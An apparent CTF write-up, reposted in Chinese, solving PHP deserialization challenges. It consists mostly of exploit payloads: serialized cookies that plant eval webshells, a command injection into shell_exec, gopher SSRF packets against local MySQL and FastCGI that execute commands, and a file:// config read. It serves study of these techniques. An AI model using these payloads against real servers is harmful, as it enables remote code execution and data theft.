赞
踩
这和之前的完全不一样了
<?php #error_reporting(0); session_start(); require 'service.php'; $username=$_POST['userid']; $userpwd=$_POST['userpwd']; $service=new service(); $user=$service->login($username,$userpwd); if($user){ setcookie('user',base64_encode(serialize($user)),time()+60); header("location:index.php"); }else{ header("location:login.php"); } ?>
然后添加
cookie:
user=TzozOiJkYW8iOjE6e3M6OToiAGRhbwBjb25uIjtPOjM6ImxvZyI6Mjp7czo1OiJ0aXRsZSI7czo1OiIxLnBocCI7czo0OiJpbmZvIjtzOjI1OiI8P3BocCBAZXZhbCgkX1BPU1RbMV0pOz8%2BIjt9fQ%3D%3D
这是hackbar发的
如果是bp的话可以直接发但是我不知道为啥我的bp突然发不了了,然后访问1.php进行rce
我是终于找到了在一堆里面弄
public function clearCache(){
shell_exec('rm -rf ./'.$this->config->cache_dir.'/*');
}
EXP
<?php
class config{
public $cache_dir=';echo "<?php eval(\$_POST[1]);?>" > 1.php;';
//这里的反斜杠转义$,因为shell中的$有特殊含义
}
class dao{
private $config;
public function __construct(){
$this->config=new config();
}
}
$a=new dao();
echo base64_encode(serialize($a));
?>
cookie:
service=TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czo5OiJjYWNoZV9kaXIiO3M6NDI6IjtlY2hvICI8P3BocCBldmFsKFwkX1BPU1RbMV0pOz8+IiA+IDEucGhwOyI7fX0=
访问1.php再rce就行了,但是不知道为啥我今天做不出来,弄了好一会了
用工具打ssrf
gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%45%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%31%5d%3b%29%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%36%2e%70%68%70%27%01%00%00%00%01
<?php
class config{
public $update_url="gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%45%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%31%5d%3b%29%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%36%2e%70%68%70%27%01%00%00%00%01";
}
class dao{
public $config;
function __construct(){
$this->config=new config();
}
}
echo urlencode(base64_encode(serialize(new dao())));
?>
加了密码,打FastCGI
<?php
class config{
public $update_url="gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%00%F6%06%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH58%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%09SCRIPT_FILENAMEindex.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%3A%04%00%3C%3Fphp%20system%28%27tac%20f%2A%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00";
}
class dao{
public $config;
function __construct(){
$this->config=new config();
}
}
echo urlencode(base64_encode(serialize(new dao())));
?>
这个index.php的填写是填写网站的默认文件所以自然是他,然后我们打通之后访问index.php拿flag因为index.php也使用了同样的方法
![994d4e7339c760ff.png)
说的源码没变,这里我们写个EXP看配置文件ngnix.conf
<?php
class config{
public $update_url='file:///etc/nginx/nginx.conf';
}
class dao{
private $config;
public function __construct(){
$this->config=new config();
}
}
echo base64_encode(serialize(new dao()));
?>
TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czoxMDoidXBkYXRlX3VybCI7czoyODoiZmlsZTovLy9ldGMvbmdpbngvbmdpbnguY29uZiI7fX0=
作者:OceanSec
链接:https://juejin.cn/post/7083293190022758407
来源:稀土掘金
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
server {
listen 4476;
server_name localhost;
root /var/flag;
index index.html;
}
# 每一个http块都可以包含多个server块,而每个server块就相当于一台虚拟主机,它内部可有多台主机联合提供服务,一起对外提供在逻辑上关系密切的一组服务
<?php
class config{
public $update_url='http://127.0.0.1:4476';
}
class dao{
private $config;
public function __construct(){
$this->config=new config();
}
}
echo base64_encode(serialize(new dao()));
?>
正常是能看到回显的
这些题都要在index.php发包才可以
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。